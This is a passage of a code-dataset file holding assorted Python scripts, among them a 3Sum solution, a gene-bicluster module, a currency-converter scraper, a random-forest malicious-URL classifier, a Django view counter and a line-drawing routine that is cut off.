+{"seq_id":"508181988","text":"# https://leetcode.com/problems/3sum/description/\n\nclass Solution(object):\n def threeSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n # check if length is long enough\n if len(nums)<3:\n return []\n\n # create a occurrence dict for the counts\n occurrences = dict()\n results = []\n for num in nums:\n if num not in occurrences:\n occurrences[num] = 1\n else:\n occurrences[num] += 1\n\n # check for [0,0,0] case\n if 0 in occurrences and occurrences[0] >= 3 :\n results.append([0,0,0])\n\n # used for duplicates\n result_tuple_set = set()\n\n # iterate through positive number pairs, negative number pairs and pos-negative number pairs\n pos,neg = set(),set()\n for num in nums:\n if num > 0:\n pos.add(num)\n elif num < 0:\n neg.add(num)\n\n for p1 in pos:\n for p2 in pos - set([p1]):\n if (-p1-p2) in occurrences:\n if tuple(sorted([p1,p2,-p1-p2])) not in result_tuple_set:\n result_tuple_set.add(tuple(sorted([p1,p2,-p1-p2])))\n results.append([p1,p2,-p1-p2])\n\n for n1 in neg:\n for n2 in neg - set([n1]):\n if -(n1+n2) in occurrences:\n if tuple(sorted([n1,n2,-n1-n2])) not in result_tuple_set:\n result_tuple_set.add(tuple(sorted([n1,n2,-n1-n2])))\n results.append([n1,n2,-n1-n2])\n for p1 in pos:\n for n1 in neg:\n if -(p1+n1) in occurrences:\n if -(p1+n1) == p1 and occurrences[p1] < 2:\n continue\n elif -(p1+n1) == n1 and occurrences[n1] < 2:\n continue\n\n if tuple(sorted([n1,p1,-(p1+n1)])) not in result_tuple_set:\n results.append([p1,n1,-p1-n1])\n\n return results\n\n\ns = Solution()\n# a = [-4,-2,-2,-2,0,1,2,2,2,3,3,4,4,6,6]\n# print(s.threeSum([1,1,-2]))\n\n\n","sub_path":"leetcode/3 3Sum.py","file_name":"3 3Sum.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"228246900","text":"#!/usr/bin/env python3\n\n# Workflow 9, Tissue-to-Tissue Bicluster\n\nimport asyncio\nimport concurrent.futures\nimport urllib.request\nfrom collections import defaultdict\nfrom json import JSONDecodeError\n\nimport fire\nimport pandas as pd\nimport requests\n\nfrom biolink.model import AnatomicalEntityToAnatomicalEntityAssociation, AnatomicalEntity\n\nfrom ncats.translator.core.module_payload import Payload\nfrom ncats.translator.core.data_transfer_model import ModuleMetaData, ConceptSpace\n\nbicluster_gene_url = 'https://bicluster.renci.org/RNAseqDB_bicluster_gene_to_tissue_v3_gene/'\nbicluster_bicluster_url = 'https://bicluster.renci.org/RNAseqDB_bicluster_gene_to_tissue_v3_bicluster/'\n\nrelated_biclusters_and_genes_for_each_input_gene = defaultdict(dict)\n\n\nclass BiclusterByTissueToTissue():\n\n def __init__(self):\n pass\n\n def get_ID_list(self, ID_list_url):\n with urllib.request.urlopen(ID_list_url) as url:\n ID_list = url.read().decode().split('\\n')\n return ID_list\n\n def curated_ID_list(self, ID_list):\n curated_ID_list = []\n for ID in ID_list:\n if not ID: # there was an empty ('') string in the input list of genes, we ignore those.\n continue\n else:\n ID = ID.split(None, 1)[0]\n ID = ID.lower()\n curated_ID_list.append(ID)\n return curated_ID_list\n\n def run_getinput(self, ID_list_url):\n ID_list = self.get_ID_list(ID_list_url)\n curated_ID_list = self.curated_ID_list(ID_list)\n return curated_ID_list\n\n ### !!! this is the non-async version of the code... it works but it is slow. kept for reference. !!!\n @DeprecationWarning\n def find_related_biclusters(self, curated_ID_list):\n # this function is an artifact... a way to understand 'find_related_biclusters_async', below\n for gene in curated_ID_list:\n request_1_url = bicluster_gene_url + gene + '/'\n response = requests.get(request_1_url)\n response_json = response.json()\n cooccurrence_dict_each_gene = defaultdict(dict)\n cooccurrence_dict_each_gene['related_biclusters'] = defaultdict(dict)\n cooccurrence_dict_each_gene['number_of_related_biclusters'] = len(response_json)\n for x in response_json:\n bicluster_dict = defaultdict(dict)\n cooccurrence_dict_each_gene['related_biclusters'][x['bicluster']] = []\n for related_bicluster in cooccurrence_dict_each_gene['related_biclusters']:\n request_2_url = bicluster_bicluster_url + related_bicluster + '/'\n response_2 = requests.get(request_2_url)\n response_2_json = response_2.json()\n gene_in_each_bicluster_list = [bicluster['gene'] for bicluster in response_2_json]\n cooccurrence_dict_each_gene['related_biclusters'][related_bicluster] = gene_in_each_bicluster_list\n related_biclusters_and_genes_for_each_input_gene[gene] = dict(cooccurrence_dict_each_gene)\n return related_biclusters_and_genes_for_each_input_gene\n\n async def tissue_to_tissue_biclusters_async(self, curated_ID_list):\n bicluster_url_list = [bicluster_gene_url + gene + '/' + '?include_similar=true' for gene in curated_ID_list]\n length_bicluster_url_list = len(bicluster_url_list)\n with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor_1:\n loop_1 = asyncio.get_event_loop()\n futures_1 = [loop_1.run_in_executor(executor_1, requests.get, request_1_url) for request_1_url in\n bicluster_url_list]\n for response in await asyncio.gather(*futures_1):\n cooccurrence_dict_each_gene = defaultdict(dict)\n cooccurrence_dict_each_gene['related_biclusters'] = defaultdict(dict)\n\n try:\n response_json = response.json()\n except JSONDecodeError:\n continue\n\n length_response_json = len(response_json)\n cooccurrence_dict_each_gene['number_of_related_biclusters'] = length_response_json\n if length_response_json > 0:\n gene = response_json[0]['gene']\n for x in response_json:\n bicluster = x['bicluster']\n cooccurrence_dict_each_gene['related_biclusters'][x['bicluster']] = []\n related_biclusters = [x for x in cooccurrence_dict_each_gene['related_biclusters']]\n bicluster_bicluster_url_list = [bicluster_bicluster_url + related_bicluster + '/' for\n related_bicluster in related_biclusters]\n with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor_2:\n\n loop_2 = asyncio.get_event_loop()\n futures_2 = [loop_2.run_in_executor(executor_2, requests.get, request_2_url) for request_2_url\n in bicluster_bicluster_url_list]\n for response_2 in await asyncio.gather(*futures_2):\n response_2_json = response_2.json()\n genes_in_each_bicluster = [bicluster['gene'] for bicluster in response_2_json]\n biclusterindex = [x['bicluster'] for x in response_2_json]\n cooccurrence_dict_each_gene['related_biclusters'][\n biclusterindex[0]] = genes_in_each_bicluster\n related_biclusters_and_genes_for_each_input_gene[gene] = dict(cooccurrence_dict_each_gene)\n return related_biclusters_and_genes_for_each_input_gene\n\n # the function below returns a dictionary listing all biclusters which occur in the input with a count of how many times each bicluster occurs\n def bicluster_occurences_dict(self, related_biclusters_and_genes_for_each_input_gene):\n bicluster_occurences_dict = defaultdict(dict)\n for key, value in related_biclusters_and_genes_for_each_input_gene.items():\n for key, value in value.items():\n if key == 'related_biclusters':\n for key, value in value.items():\n if bicluster_occurences_dict[key]:\n bicluster_occurences_dict[key] += 1\n else:\n bicluster_occurences_dict[key] = 1\n return bicluster_occurences_dict\n\n def unique_biclusters(self, bicluster_occurences_dict):\n list_of_unique_biclusters = []\n for key, value in bicluster_occurences_dict.items():\n if value == 1:\n list_of_unique_biclusters.append(key)\n return list_of_unique_biclusters\n\n # the method below lends itself to async ... reprogram it\n def genes_in_unique_biclusters(self, list_of_unique_biclusters, related_biclusters_and_genes_for_each_input_gene):\n dict_of_genes_in_unique_biclusters = defaultdict(dict)\n for key, value in related_biclusters_and_genes_for_each_input_gene.items():\n for key, value in value.items():\n if key == 'related_biclusters':\n for key, value in value.items():\n dict_of_genes_in_unique_biclusters[key] = []\n if key in list_of_unique_biclusters:\n dict_of_genes_in_unique_biclusters[key].append(value)\n return dict_of_genes_in_unique_biclusters\n\n def genes_in_unique_biclusters_not_in_input_gene_list(self, curated_ID_list, dict_of_genes_in_unique_biclusters):\n dict_of_genes_in_unique_biclusters_not_in_inputs = defaultdict(dict)\n for key, value in dict_of_genes_in_unique_biclusters.items():\n if value:\n for gene in value[0]:\n if gene in curated_ID_list:\n continue\n if not dict_of_genes_in_unique_biclusters_not_in_inputs[gene]:\n dict_of_genes_in_unique_biclusters_not_in_inputs[gene] = 1\n else:\n dict_of_genes_in_unique_biclusters_not_in_inputs[gene] += 1\n return dict_of_genes_in_unique_biclusters_not_in_inputs\n\n def sorted_list_of_output_genes(self, dict_of_genes_in_unique_biclusters_not_in_inputs):\n sorted_list_of_output_genes = sorted(\n (value, key) for (key, value) in dict_of_genes_in_unique_biclusters_not_in_inputs.items())\n sorted_list_of_output_genes.reverse()\n return sorted_list_of_output_genes\n\n def ids_in_unique_biclusters(self, list_of_unique_biclusters, related_biclusters_and_ids_for_each_input_id):\n dict_of_ids_in_unique_biclusters = defaultdict(dict)\n for key, value in related_biclusters_and_ids_for_each_input_id.items():\n for key, value in value.items():\n if key == 'related_biclusters':\n for key, value in value.items():\n dict_of_ids_in_unique_biclusters[key] = []\n if key in list_of_unique_biclusters:\n dict_of_ids_in_unique_biclusters[key].append(value)\n return dict_of_ids_in_unique_biclusters\n\n def ids_in_unique_biclusters_not_in_input_ID_list(self, curated_ID_list, dict_of_ids_in_unique_biclusters):\n dict_of_ids_in_unique_biclusters_not_in_inputs = defaultdict(dict)\n for key, value in dict_of_ids_in_unique_biclusters.items():\n if value:\n for ID in value[0]:\n # try inserting a split fcn here and basically making a dictionary where every gene gets split and counted, etc, idk...\n if ID in curated_ID_list:\n continue\n if not dict_of_ids_in_unique_biclusters_not_in_inputs[ID]:\n dict_of_ids_in_unique_biclusters_not_in_inputs[ID] = 1\n else:\n dict_of_ids_in_unique_biclusters_not_in_inputs[ID] += 1\n return dict_of_ids_in_unique_biclusters_not_in_inputs\n\n\nclass TissueToTissueBicluster(Payload):\n\n def __init__(self, input_tissues=None):\n\n super(TissueToTissueBicluster, self).__init__(module=BiclusterByTissueToTissue())\n\n if not input_tissues:\n raise RuntimeError(\"TissueToTissueBicluster ERROR: missing mandatory input_tissues parameter\")\n\n input_tissue_ids = self.get_simple_input_identifier_list(input_tissues)\n\n most_common_tissues = asyncio.run(self.module.tissue_to_tissue_biclusters_async(input_tissue_ids))\n\n self.results = pd.DataFrame.from_records(most_common_tissues, columns=[\"hit_id\", \"score\"])\n\n\nTissueToTissueBicluster.set_metadata(\n ModuleMetaData(\n name=\"Mod9A - Tissue-to-Tissue Bicluster\",\n source='RNAseqDB Biclustering',\n association=AnatomicalEntityToAnatomicalEntityAssociation,\n domain=ConceptSpace(AnatomicalEntity, ['UBERON']),\n relationship='related_to',\n range=ConceptSpace(AnatomicalEntity, ['UBERON']),\n )\n )\n\n\ndef metadata():\n \"\"\"\n Retrieve Module Metadata\n \"\"\"\n return TissueToTissueBicluster.get_metadata()\n\n\ndef main():\n fire.Fire(TissueToTissueBicluster)\n\n\nif __name__ == '__main__':\n main()","sub_path":"ncats/translator/modules/anatomical_entity/anatomical_entity/tissue_to_tissue_bicluster.py","file_name":"tissue_to_tissue_bicluster.py","file_ext":"py","file_size_in_byte":11428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"272248344","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom babel.numbers import format_currency\n\nos.system(\"clear\")\n\n\ncode_url = \"https://www.iban.com/currency-codes\"\ncurrency_url = \"https://transferwise.com/gb/currency-converter/\"\n\n\ncountries = []\n\ncodes_request = requests.get(code_url)\ncodes_soup = BeautifulSoup(codes_request.text, \"html.parser\")\n\ntable = codes_soup.find(\"table\")\nrows = table.find_all(\"tr\")[1:]\n\nfor row in rows:\n items = row.find_all(\"td\")\n name = items[0].text\n code =items[2].text\n if name and code:\n if name != \"No universal currency\":\n country = {\n 'name':name.capitalize(),\n 'code': code\n }\n countries.append(country)\n\n\ndef ask_country(text):\n print(text)\n try:\n choice = int(input(\"#: \"))\n if choice >= len(countries) or choice < 0:\n print(\"Choose a number from the list.\")\n return ask_country(text)\n else:\n print(f\"{countries[choice]['name']}\")\n return countries[choice]\n except ValueError:\n print(\"That wasn't a number.\")\n return ask_country(text)\n\n\ndef ask_amount(a_country, b_country):\n try:\n print(f\"\\nHow many {a_country['code']} do you want to convert to {b_country['code']}?\")\n amount = int(input())\n return amount\n except ValueError:\n print(\"That wasn't a number.\")\n return ask_amount(a_country, b_country)\n \n\n\nprint(\"Welcome to CurrencyConvert PRO 2000\\n\")\nfor index, country in enumerate(countries):\n print(f\"#{index} {country['name']}\")\n\nuser_country = ask_country(\"\\nWhere are you from? Choose a country by number.\\n\")\ntarget_country = ask_country(\"\\nNow choose another country.\\n\")\n\n\namount = ask_amount(user_country, target_country)\n\nfrom_code = user_country['code']\nto_code = target_country['code']\n\ncurrency_request = requests.get(f\"{currency_url}{from_code}-to-{to_code}-rate?amount={amount}\")\ncurrency_soup = BeautifulSoup(currency_request.text, \"html.parser\")\nrate = currency_soup.find(\"span\", {\"class\":\"text-success\"}).get_text()\nif rate:\n result = float(rate) * amount\n amount = format_currency(amount, from_code, locale=\"ko_KR\")\n result = format_currency(result, to_code, locale=\"ko_KR\")\n print(f\"{amount} is {result}\")\n\n# ask_country(text) 함수 (Line 34 ~ 46)\n# 지난 시간에 완성했던 ask() 함수와 거의 비슷하나 43번째 줄에서 countries[choice] 값을 리턴해주는 부분이 추가되었습니다.\n# user_country, target_country 값 구하기 (Line 64 ~ 65)\n# ask_country(text) 함수를 불러와 사용자가 고른 나라의 이름과 통화 코드를 저장 시켜줍니다.\n# user_country, target_country 모두 같은 방식으로 동작합니다.\n# amount 값 구하기 (Line 68)\n# 사용자가 얼마만큼의 돈을 환전할지 알아내야 합니다.\n# 그러기 위해선 ask_amount 함수를 작성하여 인자 값으로 user_country, target_country 를 보내야합니다.\n# ask_amount(a_country, b_country) 함수 (Line 49 ~ 56)\n# 사용자가 선택한 두 나라의 정보를 인자 값으로 받아왔습니다.\n# 두 나라의 정보는 오로지 사용자에게 질문을 던지는 출력문에만 쓰입니다.\n# amount = int(input()) 을 사용하여 사용자에게 환전할 돈의 양을 묻습니다.\n# 돈은 숫자이므로 반드시 int() 로 감싸서 형변환 시켜줍니다.\n# 그리고 amount 값을 리턴 시켜줍니다.\n# 사용자가 만약 숫자가 아닌 문자를 입력했을 경우를 대비하여 try-except문을 사용하여 예외처리를 해줍니다.\n# 사용자가 선택한 두 나라의 통화 코드(from_code, to_code) 가져오기 (Line 70 ~ 71)\n# 2번에서 구한 user_country, target_country 값을 이용하여 간단히 통화 코드를 가져올 수 있습니다.\n# 각각의 새로운 변수에 user_country['code'] , target_country['code'] 를 넣어주시면 오로지 통화 코드만 저장되는 것을 볼 수 있습니다.\n# 홈페이지에서 환전 결과를 가져오기 (Line 73 ~ 80)\n# 스크래핑을 하기에 앞서, requests 라이브러리를 이용하여 Transfer Wise 홈페이지에 HTTP 요청을 보내야합니다.\n# 사용자로부터 입력을 받은 정보들을 URL에 포맷팅하여 GET 방식으로 HTTP 요청을 아래와 같은 코드로 보냅니다.\n# currency_request = requests.get(f\"{currency_url}{from_code}-to-{to_code}-rate?amount={amount}\")\n# beautifulSoup 라이브러리를 사용하여 해당 홈페이지의 html 코드들을 가져옵니다.\n# 위의 사진은 환전 결과 값을 가져오기 위해 크롬 개발자 도구에서 inspect한 결과입니다.\n# 홈페이지의 코드 변경으로 인해 환전 결과의 value 값을 가져올 수 없습니다.\n# 그러므로 환전 결과 값을 가져오는 것이 아니라 다른 방법으로 접근하여야 됩니다.\n# 홈페이지 하단에 보시면 1 COP = 0.30937 KRW 이라는 값이 있는데 초록색 글씨로 되어있는 0.30937 을 긁어와서 amount 값이랑 곱해주는 것으로 환전 결과 값을 얻을 수 있습니다.\n# 저 초록색 값을 가져오기 위해 rate = currency_soup.find(\"span\", {\"class\":\"text-success\"}).get_text() 이라는 코드를 작성해줍니다.\n# 혹시 rate 값이 존재하지 않을 경우도 생각하여 if rate: 를 사용하여 rate 값이 존재할 때만 환전 값을 구하도록 코드를 작성합니다.\n# 위에서 구한 rate 값을 float 형식으로 변환한 다음 amount 값이랑 곱하여 환전 값을 구하기 위해 아래와 같이 작성합니다.\n# result = float(rate) * amount\n# 마지막으로 환전할 돈의 양(amount) , 환전 결과(result) 를 format_currency() 를 이용하여 통화 형식으로 포맷 시켜줍니다.\n# 결론\n# 홈페이지의 코드 변경으로 인해 환전 결과 값을 바로 가져올 수 없게 되어 다른 방법을 생각해서 해결해야 되는 챌린지였습니다.\n# 같은 홈페이지여도 시간이 지남에 따라 html코드가 변경 되는 경우가 꽤 있으므로 주의하여야 합니다.\n","sub_path":"~08.01까지/nadocoding/6일자정답해설.py","file_name":"6일자정답해설.py","file_ext":"py","file_size_in_byte":5985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"68581549","text":"# Program to find the factorial of a given number with recursion\n\n# To check or set recursion limit beyond 1000, we need to import sys. Default is 1000\nimport sys\n\n# Change or set the recursion limit\nsys.setrecursionlimit(2000)\n# Printing the current recursion limit\nprint(\"The current recursion limit is: \", sys.getrecursionlimit())\n\n\nresult = 1\n\n\ndef factorial_with_recursion(n):\n # A global variable can be accessed and can't be modified inside a function, so that's why we have to declare\n # using global keyword to modify that variable\n global result\n\n if n == 0:\n result = 1\n else:\n result = n * factorial_with_recursion(n - 1)\n\n return result\n\n\nfinal_result = factorial_with_recursion(int(input(\"Enter the factorial to calculate: \")))\n\nprint(final_result)\n\n\n","sub_path":"Factorial/Factorial using recursion.py","file_name":"Factorial using recursion.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"146393602","text":"#!/usr/bin/python3\n\n\nclass WrappingPaperCounter:\n total_size = 0 # type: int\n\n def reset(self):\n self.total_size = 0\n\n def consume(self, present_dimensions: str):\n (l, w, h) = [int(dim) for dim in present_dimensions.split('x')]\n lw = l * w # type: int\n lh = l * h # type: int\n wh = w * h # type: int\n self.total_size += 2 * lw + 2 * lh + 2 * wh + min(lw, lh, wh)\n\n\ndef should_quit(command):\n return command in [\"quit\", \"q\"]\n\n\nif __name__ == \"__main__\":\n input_file = \"\" # type: str\n wrapping_paper_counter = WrappingPaperCounter()\n while not should_quit(input_file):\n input_file = input(\"input_file: \") # type: str\n if not should_quit(input_file):\n wrapping_paper_counter.reset()\n with open(input_file) as file:\n present_sizes = file.readlines()\n for present_size in present_sizes:\n wrapping_paper_counter.consume(present_size)\n print(\"We need {} square feet of wrapping paper\".format(wrapping_paper_counter.total_size))\n print(\"It's over, you can go outside and play now\")\n","sub_path":"src/main/python/2_wrap_battle.py","file_name":"2_wrap_battle.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"290572827","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import interp\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import confusion_matrix\nfrom mlxtend.plotting import plot_confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import auc\nimport pickle\nfrom names import names\n\nforest_saved_file = 'forestPredictor.sav'\nfeature_mask = 'featuresMask.csv'\nroc_file = 'ROC_plot_RForest.png'\nconfusion_matrix_file = 'confusion_matrix_plot_RForest.png'\n\ndata_csv = pd.read_csv('dropped.csv', delimiter='|', names=names, header=0)\n\n# print(train_data_csv.head(5))\n\nforest = RandomForestClassifier()\n\n# convert class to binary (0, 1) from benign, malicious\nlb = LabelBinarizer()\ndata_csv['class'] = lb.fit_transform(data_csv['class'].values)\nprint(data_csv.groupby(['class']).size())\n\n# drop the URL column\ndata_csv.drop(columns=['url'], axis=1, inplace=True)\narray = data_csv.values\n\n# load Y with the classes, making sure they are of int type\nY = array[:, -1]\nY = Y.astype(int)\n\n# drop the Class column\ndata_csv.drop(columns=['class'], axis=1, inplace=True)\narray = data_csv.values\n\n# load X with the features\nX = array[:, 0: -1]\n\n# set up for 10 fold cross validation\nsplits = 10\nkf = KFold(n_splits=splits)\nkf.get_n_splits(X, Y)\n\nsummation = 0\n\n# build empty 2x2 matrix\nmatrix_sum = [2, 2]\n\ntprs = []\naucs = []\nmean_fpr = np.linspace(0, 1, 100)\ni = 0\n\nfor train_index, test_index in kf.split(X, Y):\n X_train, X_test = X[train_index], X[test_index]\n Y_train, Y_test = Y[train_index], Y[test_index]\n forest.fit(X_train, Y_train)\n prediction = forest.predict(X_test)\n # print(classification_report(Y_test, prediction))\n matrix = confusion_matrix(Y_test, prediction)\n matrix_sum = matrix_sum + matrix\n summation += accuracy_score(Y_test, prediction)\n\n # Compute ROC curve\n probas_ = forest.fit(X[train_index], Y[train_index]).predict_proba(X[test_index])\n fpr, tpr, thresholds = roc_curve(Y[test_index], probas_[:, 1])\n tprs.append(interp(mean_fpr, fpr, tpr))\n tprs[-1][0] = 0.0\n roc_auc = auc(fpr, tpr)\n aucs.append(roc_auc)\n plt.plot(fpr, tpr, lw=1, alpha=0.3,\n label='ROC fold %d (AUC = %0.2f)' % (i, roc_auc))\n\n i += 1\n\nprint(\"Confusion Matrix\")\nprint(matrix_sum)\n\n# break out the True Positive, False Positive, False Negative and True Negative from the matrix\nTP = matrix_sum[0][0]\nFP = matrix_sum[0][1]\nFN = matrix_sum[1][0]\nTN = matrix_sum[1][1]\n\nprint(\"True Positive --- \" + str(TP))\nprint(\"False Positive ---\" + str(FP))\nprint(\"True Negative --- \" + str(TN))\nprint(\"False Negative ---\" + str(FN))\n\noverall_accuracy = format((TP + TN) / (TP + TN + FP + FN) * 100, '.2f')\ntrue_positive_rate = format(TP / (TP + FN) * 100, '.2f')\ntrue_negative_rate = format(TN / (TN + FP) * 100, '.2f')\nfalse_positive_rate = format(FP / (TN + FP) * 100, '.2f')\nfalse_negative_rate = format(FN / (FN + TP) * 100, '.2f')\nprecision = format(TP / (TP + FP) * 100, '.2f')\n\n\n# average accuracy of the model\naverage = (summation / splits) * 100\naverage = format(average, '.2f')\n\n\nprint(\"Average Accuracy of model: \" + average + '%')\nprint(\"Overall Accuracy: \" + overall_accuracy + '%')\nprint(\"True Positive Rate: \" + true_positive_rate + '%')\nprint(\"True Negative Rate: \" + true_negative_rate + '%')\nprint(\"False Positive Rate: \" + false_positive_rate + '%')\nprint(\"False Negative Rate: \" + false_negative_rate + '%')\nprint(\"Precision of model: \" + precision)\n\n\n# Calculate and print ROC curve\nmean_tpr = np.mean(tprs, axis=0)\nmean_tpr[-1] = 1.0\nmean_auc = auc(mean_fpr, mean_tpr)\nstd_auc = np.std(aucs)\nplt.plot(mean_fpr, mean_tpr, color='b',\n label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_auc, std_auc),\n lw=2, alpha=.8)\n\nstd_tpr = np.std(tprs, axis=0)\ntprs_upper = np.minimum(mean_tpr + std_tpr, 1)\ntprs_lower = np.maximum(mean_tpr - std_tpr, 0)\nplt.fill_between(mean_fpr, tprs_lower, tprs_upper, color='grey', alpha=.2,\n label=r'$\\pm$ 1 std. dev.')\n\nplt.xlim([-0.05, 1.05])\nplt.ylim([-0.05, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('Receiver Operating Curve Random Forest URL Prediction \\n with accuracy of ' + average + ' percent')\nplt.legend(loc=\"lower right\")\nplt.savefig(roc_file)\n\n# Plot the Confusion Matrix\nplt.title('Confusion Matrix Random Forest URL Prediction \\n with accuracy of ' + average + ' percent')\nfig, ax = plot_confusion_matrix(conf_mat=matrix_sum, figsize=(10, 5))\nplt.savefig(confusion_matrix_file)\n\n\n# dump the model for later use\n\npickle.dump(forest, open(forest_saved_file, 'wb'))\n\n","sub_path":"randomForest.py","file_name":"randomForest.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"60104804","text":"# pork_suimai/apps/diy_count/templatetags/count_tag.py\nfrom django import template\nfrom ..models import ReadNum\nregister = template.Library()\n\n# 文章详情内使用\n@register.simple_tag\ndef get_read_detail(request, obj):\n key = \"%s_read\" % (obj.slug)\n read_num, created = ReadNum.objects.get_or_create(slug_name=obj.slug)\n if not request.COOKIES.get(key) and request.user != obj.author: # 如果客户端请求中没有key这个cookie\n '''get_or_create是django的内置方法,获取或创建\n 这里整个函数的目的是,获取到请求,如果没有key这个cookie,阅读数加一,并返回阅读数\n 如果有这个cookice,则直接返回阅读数 \n '''\n read_num.read_detail_num += 1\n read_num.save()\n get_read_num = ReadNum.objects.get(slug_name=obj.slug).read_detail_num\n return get_read_num\n\n# 文章列表和其它地方使用\n@register.simple_tag\ndef read_count_tag(slug):\n list_read_num = ReadNum.objects.get(slug_name=slug).read_detail_num\n\n return list_read_num","sub_path":"apps/diy_count/templatetags/count_tag.py","file_name":"count_tag.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"560395879","text":"class Status:\n projects, invest = [], []\n NPV, E, D = 0, 0, 0\n\n def __init__(self, prj: list, data):\n self.projects = prj\n invest = [0] * len(data['period'])\n i = 0\n for pr in self.projects:\n if pr != -1:\n period = pr + data[\"projects\"][i][\"lenght\"]\n count = pr\n for inv in invest:\n # считать INV с учетом интервальности\n inv = data['projects'][i][count - pr]\n if count < period:\n break\n #считать NPV с учетом интервальности\n NPV = NPV + data['projects'][i][pr]\n #посчитать МО и ДИСП\n i = i + 1\n\n\ndef gray(self, time: int, change: list, base_list: list, k=0):\n if k == len(change):\n self.convert(base_list, change)\n else:\n change[k] = -1\n self.gray(time, change, base_list, k + 1)\n change[k] = time\n self.r_gray(time, change, base_list, k + 1)\n\n\ndef r_gray(self, time: int, change: list, base_list: list, k=0):\n if k == len(change):\n self.convert(base_list, change)\n else:\n change[k] = time\n self.gray(time, change, base_list, k + 1)\n change[k] = -1\n self.r_gray(time, change, base_list, k + 1)","sub_path":"invest/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"246338113","text":"from tkinter import *\nimport tkinter.filedialog\nimport sys\nfrom PyQt5.QtWidgets import (QFileDialog, QAbstractItemView, QListView,QTreeView, QApplication, QDialog)\nfrom os import listdir\nfrom os.path import isfile, join\n\nroot = Tk()\nroot.withdraw()\n\nautoFolder = 1\n\nrois = []\nbackground = []\nneuron = []\n\nmsgBox = 'yes'\n\nif autoFolder == 0:\n#Select files\n\twhile msgBox == 'yes':\n\t\trois.append(root.tk.splitlist(tkinter.filedialog.askopenfilenames(initialdir='C:/Users/Diana/Desktop/Data/',title='choose your rois')))\n\t\tbackground.append(tkinter.filedialog.askopenfilename(initialdir=rois[-1],title='choose your background'))\n\t\tneuron.append(tkinter.filedialog.askopenfilename(initialdir=rois[-1],title='choose your neuron'))\n\t\tmsgBox = messagebox.askquestion ('Add data','Do you want to add data?',icon = 'warning')\nelse:\n#Select directories to go faster\n\tclass getExistingDirectories(QFileDialog):\n\t\tdef __init__(self, *args):\n\t\t\tsuper(getExistingDirectories, self).__init__(*args)\n\t\t\tself.setOption(self.DontUseNativeDialog, True)\n\t\t\tself.setFileMode(self.Directory)\n\t\t\tself.setOption(self.ShowDirsOnly, True)\n\t\t\tself.findChildren(QListView)[0].setSelectionMode(QAbstractItemView.ExtendedSelection)\n\t\t\tself.findChildren(QTreeView)[0].setSelectionMode(QAbstractItemView.ExtendedSelection)\n\n\tqapp = QApplication(sys.argv)\n\tdlg = getExistingDirectories()\n\tif dlg.exec_() == QDialog.Accepted:\n\t\tfor dir in dlg.selectedFiles():\n\t\t\troi = []\n\t\t\tonlyfiles = [f for f in listdir(dir) if isfile(join(dir, f))]\n\t\t\tfor f in onlyfiles:\n\t\t\t\t#take off the '.avi'\n\t\t\t\tnoAVI = f.split('.')[0]\n\t\t\t\t#do not process the file neuron\n\t\t\t\tif noAVI != 'neuron':\n\t\t\t\t\tlast1 = noAVI.split('_')[-1]\n\t\t\t\t\t#select as background if only one number at the end of the file name\n\t\t\t\t\tif (len(last1)==1):\n\t\t\t\t\t\tbackground.append(dir+'/'+f)\n\t\t\t\t\telse :\n\t\t\t\t\t\tlast2 = last1.split('-')[-1]\n\t\t\t\t\t\tif len(last2) == 2:\n\t\t\t\t\t\t\troi.append(dir+'/'+f)\n\t\t\t\t\t\telif len(last2) == 3:\n\t\t\t\t\t\t\tneuron.append(dir+'/'+f)\n\t\t\t\t\t\t\t\n\t\t\trois.append(roi)","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"108012044","text":"from math import radians, cos, sin\nfrom PyQt5.QtCore import QPoint, QSize, Qt\nfrom PyQt5.QtGui import (QPainter, QPixmap, QPalette, QPen)\nfrom PyQt5.QtWidgets import (QApplication, QGridLayout, QGroupBox,\n QVBoxLayout, QComboBox, QLabel, QWidget,\n QPushButton, QLineEdit, QMessageBox, QRadioButton)\n\n\ndef sign(x):\n if x > 0:\n return 1\n elif x < 0:\n return -1\n else:\n return 0\n\n\ndef alg_b_whole_numb(painter, xn, yn, xk, yk):\n\n # В процессе работы одна из координат - либо х,\n # либо у(в зависимости от углового коэффициента) - изменяктся на единицу.\n # Изменение другой координаты ( либо на нуль, либо на единицу)\n # зависит от расстояния между действительным положением отрезка и\n # ближайшими координатными сетками.\n\n # 0.5 <= dy/dx <= 1 (ошибка >= 0)\n # 0 <= dy/dx < 0.5 (ошибка < 0)\n\n # Нужно проверять только знак ошибки\n # ошибка >= 0 - подняться на пиксель\n # ошибка < 0 - не изменяться\n\n x = xn\n y = yn\n\n dx = xk - xn\n dy = yk - yn\n\n sx = 